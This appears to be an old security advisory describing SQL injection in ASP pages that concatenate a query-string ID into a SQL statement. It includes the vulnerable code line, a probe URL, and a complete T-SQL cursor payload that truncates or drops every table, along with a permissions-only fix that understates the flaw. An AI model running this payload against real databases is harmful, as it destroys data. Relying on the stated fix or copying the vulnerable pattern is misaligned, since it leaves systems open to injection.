Vulnerability asp (?) Affected ASP/SQL Description Steve Wilding posted following. A bug that he has been experimenting with is that many websites when calling products from the database don't verify the data before passing it into SQL: Sql = "SELECT * FROM Products WHERE ProductID=" & Request.QueryString("ID") They are assuming that "ID" will be a number and Allow SQL to execute it. Therefore a url like http://www.someserver.com/products.asp?ID=(SELECT+*+FROM+TableX) would generate this error Microsoft OLE DB Provider for ODBC Drivers error '80040e37' [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid object name 'TABLEX' /products.asp, line 11 This means that SQL executed the command "SELECT * FROM TableX" Now What do you suppose would happen if you where to pass this into SQL via a QueryString? DECLARE @TableName varchar(100) DECLARE Tables CURSOR FOR SELECT Name FROM SysObjects WHERE xType = 'U' OPEN Tables FETCH NEXT FROM Tables Into @TableName WHILE @@FETCH_STATUS = 0 BEGIN Exec ('Truncate Table ' + @TableName) FETCH NEXT FROM Tables END CLOSE Tables DEALLOCATE Tables EVERY TABLE IN THE DATABASE WOULD BE TRUNCATED! Change "Truncate" to "Drop" and every table would be deleted, if permissions are not properly set. Solution This is in reality is not bug, but something that happend due to bad permissions applied. Setting correct permissions will make this problem dissapear.